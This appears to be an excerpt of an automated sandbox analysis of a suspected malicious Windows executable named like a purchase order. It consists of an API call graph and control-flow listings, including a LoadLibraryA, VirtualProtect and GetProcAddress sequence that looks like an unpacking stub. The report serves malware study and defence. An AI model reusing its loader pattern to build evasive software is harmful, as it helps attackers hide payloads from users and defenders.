35913->35914 36026 37f23 58 API calls 3 library calls 35913->36026 35965 3d752 35914->35965 35917 37e67 35918 37e73 GetCommandLineW 35917->35918 36027 37f23 58 API calls 3 library calls 35917->36027 35984 450a3 GetEnvironmentStringsW 35918->35984 35921 37e72 35921->35918 35924 37e8d 35927 37e98 35924->35927 36028 33235 58 API calls 3 library calls 35924->36028 35994 44ed8 35927->35994 35929 37ea9 36008 3326f 35929->36008 35932 37eb1 35933 37ebc __wwincmdln 35932->35933 36030 33235 58 API calls 3 library calls 35932->36030 36014 1492e 35933->36014 35936 37ed0 35937 37edf 35936->35937 36031 334d8 58 API calls _doexit 35936->36031 36032 33260 58 API calls _doexit 35937->36032 35940 37ee4 __getstream 35942 39f9e 35941->35942 35942->35909 35943->35908 36033 33307 36 API calls 2 library calls 35944->36033 35946 39c6b 36034 39ebc InitializeCriticalSectionAndSpinCount __getstream 35946->36034 35948 39c70 35949 39c74 35948->35949 36036 39f0a TlsAlloc 35948->36036 36035 39cdc 61 API calls 2 library calls 35949->36035 35952 39c86 35952->35949 35954 39c91 35952->35954 35953 39c79 35953->35913 36037 38955 35954->36037 35957 39cd3 36045 39cdc 61 API calls 2 library calls 35957->36045 35960 39cb2 35960->35957 35962 39cb8 35960->35962 35961 39cd8 35961->35913 36044 39bb3 58 API calls 4 library calls 35962->36044 35964 39cc0 GetCurrentThreadId 35964->35913 35966 3d75e __getstream 35965->35966 35967 39d8b __lock 58 API calls 35966->35967 35968 3d765 35967->35968 35969 38955 __calloc_crt 58 API calls 35968->35969 35971 3d776 35969->35971 35970 3d7e1 GetStartupInfoW 35978 3d7f6 35970->35978 35981 3d925 35970->35981 35971->35970 35972 3d781 @_EH4_CallFilterFunc@8 __getstream 35971->35972 35972->35917 35973 3d9ed 36059 3d9fd RtlLeaveCriticalSection _doexit 35973->36059 35975 38955 __calloc_crt 58 API calls 35975->35978 35976 3d972 GetStdHandle 35976->35981 35977 3d985 GetFileType 35977->35981 35978->35975 35979 3d844 35978->35979 35978->35981 35980 3d878 GetFileType 35979->35980 35979->35981 36057 39fab InitializeCriticalSectionAndSpinCount 35979->36057 35980->35979 35981->35973 35981->35976 35981->35977 36058 39fab InitializeCriticalSectionAndSpinCount 35981->36058 35985 450b4 35984->35985 35986 37e83 35984->35986 36060 3899d 58 API calls 2 library calls 35985->36060 35990 44c9b GetModuleFileNameW 35986->35990 35988 450da _memmove 35989 450f0 FreeEnvironmentStringsW 35988->35989 35989->35986 35991 44ccf _wparse_cmdline 35990->35991 35993 44d0f _wparse_cmdline 35991->35993 36061 3899d 58 API calls 2 library calls 35991->36061 35993->35924 35995 44ef1 __wsetenvp 35994->35995 35999 37e9e 35994->35999 35996 38955 __calloc_crt 58 API calls 35995->35996 36004 44f1a __wsetenvp 35996->36004 35997 44f71 35998 32ed5 _free 58 API calls 35997->35998 35998->35999 35999->35929 36029 33235 58 API calls 3 library calls 35999->36029 36000 38955 __calloc_crt 58 API calls 36000->36004 36001 44f96 36002 32ed5 _free 58 API calls 36001->36002 36002->35999 36004->35997 36004->35999 36004->36000 36004->36001 36005 44fad 36004->36005 36062 44787 58 API calls __cftof_l 36004->36062 36063 38f46 8 API calls 2 library calls 36005->36063 36007 44fb9 36009 3327b __IsNonwritableInCurrentImage 36008->36009 36064 3a651 36009->36064 36011 33299 __initterm_e 36012 32ec0 __cinit 67 API calls 36011->36012 36013 332b8 _doexit __IsNonwritableInCurrentImage 36011->36013 36012->36013 36013->35932 36015 14948 36014->36015 36024 149e7 36014->36024 36016 14982 745AC8D0 36015->36016 36067 334ec 36016->36067 36020 149ae 36079 14a5b SystemParametersInfoW SystemParametersInfoW 36020->36079 36022 149ba 36023 149c2 SystemParametersInfoW 36022->36023 36023->36024 36024->35936 36025->35910 36026->35914 36027->35921 36031->35937 36032->35940 36033->35946 36034->35948 36035->35953 36036->35952 36039 3895c 36037->36039 36040 38997 36039->36040 36041 3897a 36039->36041 36046 45376 36039->36046 36040->35957 36043 39f66 TlsSetValue 36040->36043 36041->36039 36041->36040 36054 3a2b2 Sleep 36041->36054 36043->35960 36044->35964 36045->35961 36047 45381 36046->36047 36048 4539c 36046->36048 36047->36048 36049 4538d 36047->36049 36051 453ac RtlAllocateHeap 36048->36051 36053 45392 36048->36053 36056 33521 RtlDecodePointer 36048->36056 36055 38ca8 58 API calls __getptd_noexit 36049->36055 36051->36048 36051->36053 36053->36039 36054->36041 36055->36053 36056->36048 36057->35979 36058->35981 36059->35972 36060->35988 36061->35993 36062->36004 36063->36007 36065 3a654 RtlEncodePointer 36064->36065 36065->36065 36066 3a66e 36065->36066 36066->36011 36068 39d8b __lock 58 API calls 36067->36068 36069 334f7 RtlDecodePointer RtlEncodePointer 36068->36069 36080 39ef5 RtlLeaveCriticalSection 36069->36080 36071 149a7 36072 33554 36071->36072 36073 33578 36072->36073 36074 3355e 36072->36074 36073->36020 36074->36073 36081 38ca8 58 API calls __getptd_noexit 36074->36081 36076 33568 36082 38f36 9 API calls __cftof_l 36076->36082 36078 33573 36078->36020 36079->36022 36080->36071 36081->36076 36082->36078 36083 30911 36088 41ac0 36083->36088 36086 17d2c 59 API calls 36087 30946 36086->36087 36089 3091e GetLongPathNameW 36088->36089 36089->36086 36090 11055 36095 12649 36090->36095 36093 32ec0 __cinit 67 API calls 36094 11064 36093->36094 36096 177c7 59 API calls 36095->36096 36097 126b7 36096->36097 36102 13582 36097->36102 36100 12754 36101 1105a 36100->36101 36105 13416 59 API calls _memmove 36100->36105 36101->36093 36106 135b0 36102->36106 36105->36100 36107 135bd 36106->36107 36108 135a1 36106->36108 36107->36108 36109 135c4 RegOpenKeyExW 36107->36109 36108->36100 36109->36108 36110 135de RegQueryValueExW 36109->36110 36111 13614 RegCloseKey 36110->36111 36112 135ff 36110->36112 36111->36108 36112->36111 36113 78a52 36114 3588c __crtGetStringTypeA_stat 58 API calls 36113->36114 36115 78a61 36114->36115 36116 3588c __crtGetStringTypeA_stat 58 API calls 36115->36116 36117 78a75 36116->36117 36118 3588c __crtGetStringTypeA_stat 58 API calls 36117->36118 36119 78a89 36118->36119 36121 78a9c 36119->36121 36122 78db6 36119->36122 36123 78dc3 36122->36123 36124 78dc9 36122->36124 36125 32ed5 _free 58 API calls 36123->36125 36126 78dda 36124->36126 36127 32ed5 _free 58 API calls 36124->36127 36125->36124 36128 78dec 36126->36128 36129 32ed5 _free 58 API calls 36126->36129 36127->36126 36128->36121 36129->36128 36130 34996 36131 348a9 36130->36131 36134 348e6 _memmove 36130->36134 36132 34bad __flush 60 API calls 36132->36134 36133 34856 __ftell_nolock 58 API calls 36133->36134 36134->36131 36134->36132 36134->36133 36135 3da06 __write 60 API calls 36134->36135 36135->36134 36136 11016 36141 14ad2 36136->36141 36139 32ec0 __cinit 67 API calls 36140 11025 36139->36140 36142 30f36 59 API calls 36141->36142 36143 14ada 36142->36143 36144 1101b 36143->36144 36148 14a94 36143->36148 36144->36139 36149 14aaf 36148->36149 36150 14a9d 36148->36150 36152 14afe 36149->36152 36151 32ec0 __cinit 67 API calls 36150->36151 36151->36149 36153 177c7 59 API calls 36152->36153 36154 14b16 GetVersionExW 36153->36154 36155 17d2c 59 API calls 36154->36155 36156 14b59 36155->36156 36157 17e8c 59 API calls 36156->36157 36166 14b86 36156->36166 36158 14b7a 36157->36158 36180 17886 36158->36180 36160 14bf1 GetCurrentProcess IsWow64Process 36161 14c0a 36160->36161 36163 14c20 36161->36163 36164 14c89 GetSystemInfo 36161->36164 36162 4dbbd 36176 14c95 36163->36176 36165 14c56 36164->36165 36165->36144 36166->36160 36166->36162 36169 14c32 36172 14c95 2 API calls 36169->36172 36170 14c7d GetSystemInfo 36171 14c47 36170->36171 36171->36165 36174 14c4d FreeLibrary 36171->36174 36173 14c3a GetNativeSystemInfo 36172->36173 36173->36171 36174->36165 36177 14c2e 36176->36177 36178 14c9e LoadLibraryA 36176->36178 36177->36169 36177->36170 36178->36177 36179 14caf GetProcAddress 36178->36179 36179->36177 36181 17894 36180->36181 36182 17e8c 59 API calls 36181->36182 36183 178a4 36182->36183 36183->36166 36184 13a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 36185 13ac2 LoadImageW RegisterClassExW 36184->36185 36186 4d3cc 36184->36186 36191 13041 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 36185->36191 36195 148fe LoadImageW EnumResourceNamesW 36186->36195 36190 4d3d5 36192 130d2 LoadIconW 36191->36192 36194 13107 36192->36194 36195->36190 36196 19aac0 36197 19aad0 36196->36197 36198 19abea LoadLibraryA 36197->36198 36201 19ac2f VirtualProtect VirtualProtect 36197->36201 36199 19ac01 36198->36199 36199->36197 36203 19ac13 GetProcAddress 36199->36203 36202 19ac94 36201->36202 36202->36202 36203->36199 36204 19ac29 ExitProcess 36203->36204 36205 14f5d 36206 14f68 LoadLibraryExW 36205->36206 36207 4dc3f 36205->36207 36225 14cc8 36206->36225 36208 14faa 66 API calls 36207->36208 36210 4dc46 36208->36210 36212 14cc8 3 API calls 36210->36212 36214 4dc4e 36212->36214 36251 1506b 74 API calls __fread_nolock 36214->36251 36215 14f8f 36215->36214 36216 14f9b 36215->36216 36217 14faa 66 API calls 36216->36217 36219 14fa0 36217->36219 36220 4dc65 36252 791b2 GetSystemTimeAsFileTime 36220->36252 36222 4dc75 36253 15027 69 API calls 36222->36253 36224 4dc82 36254 14d94 36225->36254 36228 14ced 36229 14d08 36228->36229 36230 14cff FreeLibrary 36228->36230 36232 14dd0 36229->36232 36230->36229 36231 14d94 2 API calls 36231->36228 36233 30f36 59 API calls 36232->36233 36234 14de5 36233->36234 36235 1538e 59 API calls 36234->36235 36236 14df1 _memmove 36235->36236 36237 14e2c 36236->36237 36238 14f21 36236->36238 36239 14ee9 36236->36239 36264 15027 69 API calls 36237->36264 36267 799c4 79 API calls 36238->36267 36258 14fe9 CreateStreamOnHGlobal 36239->36258 36244 14e35 36245 14ec9 36244->36245 36247 4dc00 36244->36247 36265 1506b 74 API calls __fread_nolock 36244->36265 36266 15045 69 API calls _fseek 36244->36266 36245->36215 36268 15045 69 API calls _fseek 36247->36268 36249 4dc14 36269 1506b 74 API calls __fread_nolock 36249->36269 36251->36220 36252->36222 36253->36224 36255 14ce1 36254->36255 36256 14d9d LoadLibraryA 36254->36256 36255->36228 36255->36231 36256->36255 36257 14dae GetProcAddress 36256->36257 36257->36255 36259 15020 36258->36259 36260 15003 FindResourceExW 36258->36260 36259->36237 36260->36259 36261 4dc8c LoadResource 36260->36261 36261->36259 36262 4dca1 SizeofResource 36261->36262 36262->36259 36263 4dcb5 LockResource 36262->36263 36263->36259 36264->36244 36265->36244 36266->36244 36267->36237 36268->36249 36269->36245 36270 136e5 36271 136ca NtdllDefWindowProc_W 36270->36271 36272 136d8 36271->36272 36273 139e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 36274 11066 36279 1f8cf 36274->36279 36276 1106c 36277 32ec0 __cinit 67 API calls 36276->36277 36278 11076 36277->36278 36280 1f8f0 36279->36280 36312 30083 36280->36312 36284 1f937 36285 177c7 59 API calls 36284->36285 36286 1f941 36285->36286 36287 177c7 59 API calls 36286->36287 36288 1f94b 36287->36288 36289 177c7 59 API calls 36288->36289 36290 1f955 36289->36290 36291 177c7 59 API calls 36290->36291 36292 1f993 36291->36292 36293 177c7 59 API calls 36292->36293 36294 1fa5e 36293->36294 36322 260e7 36294->36322 36298 1fa90 36299 177c7 59 API calls 36298->36299 36300 1fa9a 36299->36300 36350 2ff1e 36300->36350 36302 1fae1 36303 1faf1 GetStdHandle 36302->36303 36304 54904 36303->36304 36305 1fb3d 36303->36305 36304->36305 36307 5490d 36304->36307 36306 1fb45 OleInitialize 36305->36306 36306->36276 36357 76be1 64 API calls 36307->36357 36309 54914 36358 772b0 CreateThread 36309->36358 36311 54920 CloseHandle 36311->36306 36359 3015c 36312->36359 36315 3015c 59 API calls 36316 300c5 36315->36316 36317 177c7 59 API calls 36316->36317 36318 300d1 36317->36318 36319 17d2c 59 API calls 36318->36319 36320 1f8f6 36319->36320 36321 302e2 6 API calls 36320->36321 36321->36284 36323 177c7 59 API calls 36322->36323 36324 260f7 36323->36324 36325 177c7 59 API calls 36324->36325 36326 260ff 36325->36326 36366 25bfd 36326->36366 36329 25bfd 59 API calls 36330 2610f 36329->36330 36331 177c7 59 API calls 36330->36331 36332 2611a 36331->36332 36333 30f36 59 API calls 36332->36333 36334 1fa68 36333->36334 36335 26259 36334->36335 36336 26267 36335->36336 36337 177c7 59 API calls 36336->36337 36338 26272 36337->36338 36339 177c7 59 API calls 36338->36339 36340 2627d 36339->36340 36341 177c7 59 API calls 36340->36341 36342 26288 36341->36342 36343 177c7 59 API calls 36342->36343 36344 26293 36343->36344 36345 25bfd 59 API calls 36344->36345 36346 2629e 36345->36346 36347 30f36 59 API calls 36346->36347 36348 262a5 RegisterClipboardFormatW 36347->36348 36348->36298 36351 65ac5 36350->36351 36352 2ff2e 36350->36352 36369 79b90 60 API calls 36351->36369 36353 30f36 59 API calls 36352->36353 36355 2ff36 36353->36355 36355->36302 36356 65ad0 36357->36309 36358->36311 36360 177c7 59 API calls 36359->36360 36361 30167 36360->36361 36362 177c7 59 API calls 36361->36362 36363 3016f 36362->36363 36364 177c7 59 API calls 36363->36364 36365 300bb 36364->36365 36365->36315 36367 177c7 59 API calls 36366->36367 36368 25c05 36367->36368 36368->36329 36369->36356 36370 34a2f 36373 34a4d RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 36370->36373 36372 34a0f __getstream 36373->36372 36374 77428 36375 77433 36374->36375 36376 30f36 59 API calls 36375->36376 36377 7744a 36376->36377 36378 77459 36377->36378 36379 17f41 59 API calls 36377->36379 36379->36378 36380 4822b 36381 4826c GetLastError 36380->36381 36382 4823b 36380->36382 36402 38c87 58 API calls 3 library calls 36381->36402 36382->36381 36396 47e7d 36382->36396 36385 48291 36403 38ca8 58 API calls __getptd_noexit 36385->36403 36387 4829e GetFileType 36390 482a9 GetLastError 36387->36390 36389 48297 36404 38c87 58 API calls 3 library calls 36390->36404 36392 482d0 CloseHandle 36392->36385 36393 482de 36392->36393 36405 38ca8 58 API calls __getptd_noexit 36393->36405 36395 482e3 36395->36385 36397 47e88 ___crtIsPackagedApp 36396->36397 36398 47ee3 CreateFileW 36397->36398 36399 47e8c GetModuleHandleW GetProcAddress 36397->36399 36401 47f01 36398->36401 36400 47ea9 36399->36400 36400->36401 36401->36381 36401->36387 36402->36385 36403->36389 36404->36392 36405->36395 36406 20e73 timeGetTime 36408 20e8e 36406->36408 36407 551f3 36407->36407 36408->36407 36409 210ae timeGetTime 36408->36409 36413 20c30 36408->36413 36425 19fbd 60 API calls 36409->36425 36411 210c6 36426 1b89c 61 API calls 36411->36426 36414 30f36 59 API calls 36413->36414 36417 20ccd 36413->36417 36419 20e00 36413->36419 36415 20cb7 36414->36415 36416 30f36 59 API calls 36415->36416 36416->36417 36420 1e580 36417->36420 36421 1e59d 36420->36421 36423 1e5b1 36420->36423 36427 1e060 75 API calls _memmove 36421->36427 36424 1e5a8 36424->36419 36425->36411 36426->36413 36427->36424 36428 407b7 36433 407bc 36428->36433 36430 407c6 36441 38f36 9 API calls __cftof_l 36430->36441 36432 407d1 36439 407c1 36433->36439 36442 3394b 60 API calls 2 library calls 36433->36442 36435 40975 36435->36439 36443 3394b 60 API calls 2 library calls 36435->36443 36437 40994 36437->36439 36444 3394b 60 API calls 2 library calls 36437->36444 36439->36432 36440 38ca8 58 API calls __getptd_noexit 36439->36440 36440->36430 36441->36432 36442->36435 36443->36437 36444->36439 36445 16f36 36446 16f38 36445->36446 36447 30f36 59 API calls 36446->36447 36448 16f91 36447->36448 36449 1700d 36448->36449 36451 174bd 36448->36451 36452 174d0 36451->36452 36455 1757e 36451->36455 36453 30f36 59 API calls 36452->36453 36456 17502 36452->36456 36453->36456 36454 30f36 59 API calls 36454->36456 36455->36448 36456->36454 36456->36455 36457 11078 36462 171eb 36457->36462 36459 1108c 36460 32ec0 __cinit 67 API calls 36459->36460 36461 11096 36460->36461 36463 171fb __ftell_nolock 36462->36463 36464 177c7 59 API calls 36463->36464 36465 172b1 36464->36465 36493 14864 36465->36493 36467 172ba 36500 3068b 36467->36500 36474 177c7 59 API calls 36475 172eb 36474->36475 36476 17eec 59 API calls 36475->36476 36477 172f4 RegOpenKeyExW 36476->36477 36478 17316 36477->36478 36479 4ec0a RegQueryValueExW 36477->36479 36478->36459 36480 4ec27 36479->36480 36481 4ec9c RegCloseKey 36479->36481 36482 30f36 59 API calls 36480->36482 36481->36478 36492 4ecae _wcscat __wsetenvp 36481->36492 36483 4ec40 36482->36483 36485 1538e 59 API calls 36483->36485 36484 17b52 59 API calls 36484->36492 36486 4ec4b RegQueryValueExW 36485->36486 36487 4ec68 36486->36487 36489 4ec82 36486->36489 36488 17d2c 59 API calls 36487->36488 36488->36489 36489->36481 36490 17f41 59 API calls 36490->36492 36491 13f84 59 API calls 36491->36492 36492->36478 36492->36484 36492->36490 36492->36491 36494 41ac0 __ftell_nolock 36493->36494 36495 14871 GetModuleFileNameW 36494->36495 36496 17f41 59 API calls 36495->36496 36497 14897 36496->36497 36519 148ae 36497->36519 36499 148a1 36499->36467 36501 41ac0 __ftell_nolock 36500->36501 36502 30698 GetFullPathNameW 36501->36502 36503 306ba 36502->36503 36504 17d2c 59 API calls 36503->36504 36505 172c5 36504->36505 36506 17e0b 36505->36506 36507 4f0a3 36506->36507 36508 17e1f 36506->36508 36534 18189 59 API calls 36507->36534 36529 17db0 36508->36529 36511 172d3 36513 13f84 36511->36513 36512 4f0ae __wsetenvp _memmove 36514 13f92 36513->36514 36518 13fb4 _memmove 36513->36518 36516 30f36 59 API calls 36514->36516 36515 30f36 59 API calls 36517 13fc8 36515->36517 36516->36518 36517->36474 36518->36515 36520 41ac0 __ftell_nolock 36519->36520 36521 148bb GetFullPathNameW 36520->36521 36522 148f7 36521->36522 36523 148da 36521->36523 36524 17eec 59 API calls 36522->36524 36525 17d2c 59 API calls 36523->36525 36526 148e6 36524->36526 36525->36526 36527 17886 59 API calls 36526->36527 36528 148f2 36527->36528 36528->36499 36530 17dbf __wsetenvp 36529->36530 36532 17dd0 _memmove 36530->36532 36535 18189 59 API calls 36530->36535 36532->36511 36533 4f060 _memmove 36534->36512 36535->36533 36536 78e3a 36537 78e5f 36536->36537 36539 78e48 __tzset_nolock _memmove 36536->36539 36540 35752 36537->36540 36543 3576d 36540->36543 36542 35768 36542->36539 36544 35779 __getstream 36543->36544 36545 3578f _memset 36544->36545 36546 357bc 36544->36546 36547 357b4 __getstream 36544->36547 36570 38ca8 58 API calls __getptd_noexit 36545->36570 36548 36d8e __lock_file 59 API calls 36546->36548 36547->36542 36549 357c2 36548->36549 36556 3558d 36549->36556 36552 357a9 36571 38f36 9 API calls __cftof_l 36552->36571 36560 355a8 _memset 36556->36560 36563 355c3 36556->36563 36557 355b3 36661 38ca8 58 API calls __getptd_noexit 36557->36661 36559 355b8 36662 38f36 9 API calls __cftof_l 36559->36662 36560->36557 36560->36563 36567 35603 36560->36567 36572 357f6 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 36563->36572 36564 35714 _memset 36664 38ca8 58 API calls __getptd_noexit 36564->36664 36565 34856 __ftell_nolock 58 API calls 36565->36567 36567->36563 36567->36564 36567->36565 36573 40fdb 36567->36573 36641 40d27 36567->36641 36663 40e48 58 API calls 3 library calls 36567->36663 36570->36552 36571->36547 36572->36547 36574 41013 36573->36574 36575 40ffc 36573->36575 36576 4174b 36574->36576 36580 4104d 36574->36580 36674 38c74 58 API calls __getptd_noexit 36575->36674 36690 38c74 58 API calls __getptd_noexit 36576->36690 36579 41001 36675 38ca8 58 API calls __getptd_noexit 36579->36675 36583 41055 36580->36583 36590 4106c 36580->36590 36581 41750 36691 38ca8 58 API calls __getptd_noexit 36581->36691 36676 38c74 58 API calls __getptd_noexit 36583->36676 36586 41061 36692 38f36 9 API calls __cftof_l 36586->36692 36587 4105a 36677 38ca8 58 API calls __getptd_noexit 36587->36677 36589 41081 36678 38c74 58 API calls __getptd_noexit 36589->36678 36590->36589 36591 4109b 36590->36591 36594 410b9 36590->36594 36621 41008 36590->36621 36591->36589 36596 410a6 36591->36596 36679 3899d 58 API calls 2 library calls 36594->36679 36665 45deb 36596->36665 36597 410c9 36599 410d1 36597->36599 36600 410ec 36597->36600 36680 38ca8 58 API calls __getptd_noexit 36599->36680 36682 41a41 60 API calls 3 library calls 36600->36682 36601 411ba 36604 41233 ReadFile 36601->36604 36605 411d0 GetConsoleMode 36601->36605 36607 41255 36604->36607 36608 41713 GetLastError 36604->36608 36609 411e4 36605->36609 36610 41230 36605->36610 36606 410d6 36681 38c74 58 API calls __getptd_noexit 36606->36681 36607->36608 36615 41225 36607->36615 36612 41213 36608->36612 36613 41720 36608->36613 36609->36610 36614 411ea ReadConsoleW 36609->36614 36610->36604 36626 41219 36612->36626 36683 38c87 58 API calls 3 library calls 36612->36683 36688 38ca8 58 API calls __getptd_noexit 36613->36688 36614->36615 36617 4120d GetLastError 36614->36617 36623 414f7 36615->36623 36625 4128a 36615->36625 36615->36626 36617->36612 36619 41725 36689 38c74 58 API calls __getptd_noexit 36619->36689 36621->36567 36622 32ed5 _free 58 API calls 36622->36621 36623->36626 36629 415fd ReadFile 36623->36629 36624 41377 36624->36626 36631 41434 36624->36631 36632 41424 36624->36632 36635 413e4 MultiByteToWideChar 36624->36635 36625->36624 36628 412f6 ReadFile 36625->36628 36626->36621 36626->36622 36630 41317 GetLastError 36628->36630 36639 41321 36628->36639 36634 41620 GetLastError 36629->36634 36640 4162e 36629->36640 36630->36639 36631->36635 36686 41a41 60 API calls 3 library calls 36631->36686 36685 38ca8 58 API calls __getptd_noexit 36632->36685 36634->36640 36635->36617 36635->36626 36639->36625 36684 41a41 60 API calls 3 library calls 36639->36684 36640->36623 36687 41a41 60 API calls 3 library calls 36640->36687 36642 40d32 36641->36642 36646 40d47 36641->36646 36729 38ca8 58 API calls __getptd_noexit 36642->36729 36644 40d37 36730 38f36 9 API calls __cftof_l 36644->36730 36647 40d7c 36646->36647 36655 40d42 36646->36655 36731 46164 58 API calls __malloc_crt 36646->36731 36649 34856 __ftell_nolock 58 API calls 36647->36649 36650 40d90 36649->36650 36696 40ec7 36650->36696 36652 40d97 36653 34856 __ftell_nolock 58 API calls 36652->36653 36652->36655 36654 40dba 36653->36654 36654->36655 36656 34856 __ftell_nolock 58 API calls 36654->36656 36655->36567 36657 40dc6 36656->36657 36657->36655 36658 34856 __ftell_nolock 58 API calls 36657->36658 36659 40dd3 36658->36659 36660 34856 __ftell_nolock 58 API calls 36659->36660 36660->36655 36661->36559 36662->36563 36663->36567 36664->36559 36666 45df6 36665->36666 36667 45e03 36665->36667 36693 38ca8 58 API calls __getptd_noexit 36666->36693 36669 45e0f 36667->36669 36694 38ca8 58 API calls __getptd_noexit 36667->36694 36669->36601 36671 45dfb 36671->36601 36672 45e30 36695 38f36 9 API calls __cftof_l 36672->36695 36674->36579 36675->36621 36676->36587 36677->36586 36678->36587 36679->36597 36680->36606 36681->36621 36682->36596 36683->36626 36684->36639 36685->36626 36686->36635 36687->36640 36688->36619 36689->36626 36690->36581 36691->36586 36692->36621 36693->36671 36694->36672 36695->36671 36697 40ed3 __getstream 36696->36697 36698 40ef7 36697->36698 36699 40ee0 36697->36699 36700 40fbb 36698->36700 36702 40f0b 36698->36702 36732 38c74 58 API calls __getptd_noexit 36699->36732 36740 38c74 58 API calls __getptd_noexit 36700->36740 36705 40f36 36702->36705 36706 40f29 36702->36706 36704 40ee5 36733 38ca8 58 API calls __getptd_noexit 36704->36733 36710 40f43 36705->36710 36711 40f58 36705->36711 36734 38c74 58 API calls __getptd_noexit 36706->36734 36707 40f2e 36741 38ca8 58 API calls __getptd_noexit 36707->36741 36735 38c74 58 API calls __getptd_noexit 36710->36735 36713 3d386 ___lock_fhandle 59 API calls 36711->36713 36716 40f5e 36713->36716 36715 40f48 36736 38ca8 58 API calls __getptd_noexit 36715->36736 36720 40f84 36716->36720 36721 40f71 36716->36721 36717 40f50 36742 38f36 9 API calls __cftof_l 36717->36742 36718 40eec __getstream 36718->36652 36737 38ca8 58 API calls __getptd_noexit 36720->36737 36724 40fdb __read_nolock 70 API calls 36721->36724 36725 40f7d 36724->36725 36739 40fb3 RtlLeaveCriticalSection __unlock_fhandle 36725->36739 36726 40f89 36738 38c74 58 API calls __getptd_noexit 36726->36738 36729->36644 36730->36655 36731->36647 36732->36704 36733->36718 36734->36707 36735->36715 36736->36717 36737->36726 36738->36725 36739->36718 36740->36707 36741->36717 36742->36718

                                                Executed Functions

                                                Function 00014AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 206 14afe-14b5e call 177c7 GetVersionExW call 17d2c 211 14b64 206->211 212 14c69-14c6b 206->212 214 14b67-14b6c 211->214 213 4dac0-4dacc 212->213 215 4dacd-4dad1 213->215 216 14c70-14c71 214->216 217 14b72 214->217 219 4dad4-4dae0 215->219 220 4dad3 215->220 218 14b73-14baa call 17e8c call 17886 216->218 217->218 228 14bb0-14bb1 218->228 229 4dbbd-4dbc0 218->229 219->215 222 4dae2-4dae7 219->222 220->219 222->214 224 4daed-4daf4 222->224 224->213 226 4daf6 224->226 230 4dafb-4dafe 226->230 228->230 231 14bb7-14bc2 228->231 232 4dbc2 229->232 233 4dbd9-4dbdd 229->233 234 14bf1-14c08 GetCurrentProcess IsWow64Process 230->234 235 4db04-4db22 230->235 240 4db43-4db49 231->240 241 14bc8-14bca 231->241 242 4dbc5 232->242 236 4dbdf-4dbe8 233->236 237 4dbc8-4dbd1 233->237 238 14c0a 234->238 239 14c0d-14c1e 234->239 235->234 243 4db28-4db2e 235->243 236->242 250 4dbea-4dbed 236->250 237->233 238->239 251 14c20-14c30 call 14c95 239->251 252 14c89-14c93 GetSystemInfo 239->252 248 4db53-4db59 240->248 249 4db4b-4db4e 240->249 244 14bd0-14bd3 241->244 245 4db5e-4db6a 241->245 242->237 246 4db30-4db33 243->246 247 4db38-4db3e 243->247 253 14bd9-14be8 244->253 254 4db8a-4db8d 244->254 256 4db74-4db7a 245->256 257 4db6c-4db6f 245->257 246->234 247->234 248->234 249->234 250->237 263 14c32-14c3f call 14c95 251->263 264 14c7d-14c87 GetSystemInfo 251->264 255 14c56-14c66 252->255 259 4db7f-4db85 253->259 260 14bee 253->260 254->234 262 4db93-4dba8 254->262 256->234 257->234 259->234 260->234 265 4dbb2-4dbb8 262->265 266 4dbaa-4dbad 262->266 271 14c41-14c45 GetNativeSystemInfo 263->271 272 14c76-14c7b 263->272 267 14c47-14c4b 264->267 265->234 266->234 267->255 270 14c4d-14c50 FreeLibrary 267->270 270->255 271->267 272->271
                                                APIs
                                                • GetVersionExW.KERNEL32(?,?,00000000), ref: 00014B2B
                                                  • Part of subcall function 00017D2C: _memmove.LIBCMT ref: 00017D66
                                                • GetCurrentProcess.KERNEL32(?,0009FAEC,00000000,00000000,?,?,00000000), ref: 00014BF8
                                                • IsWow64Process.KERNEL32(00000000,?,00000000), ref: 00014BFF
                                                • GetNativeSystemInfo.KERNELBASE(00000000,?,00000000), ref: 00014C45
                                                • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00014C50
                                                • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00014C81
                                                • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00014C8D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                • String ID:
                                                • API String ID: 1986165174-0
                                                • Opcode ID: 0fdc2b3eac6586e85c2cea375d1f755ea521834ac8a9892e3863eee319ee639c
                                                • Instruction ID: e4c906bff903669c25f83e0076a585dba28c96738f03a60d667f0af1500bf89e
                                                • Opcode Fuzzy Hash: 0fdc2b3eac6586e85c2cea375d1f755ea521834ac8a9892e3863eee319ee639c
                                                • Instruction Fuzzy Hash: 9491C57154E7C0DEC771CB6894911EAFFE4AF2A300B4849AED0CB83A51D324E988D75E
                                                Function 00014FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 273 14fe9-15001 CreateStreamOnHGlobal 274 15021-15026 273->274 275 15003-1501a FindResourceExW 273->275 276 15020 275->276 277 4dc8c-4dc9b LoadResource 275->277 276->274 277->276 278 4dca1-4dcaf SizeofResource 277->278 278->276 279 4dcb5-4dcc0 LockResource 278->279 279->276 280 4dcc6-4dcce 279->280 281 4dcd2-4dce4 280->281 281->276
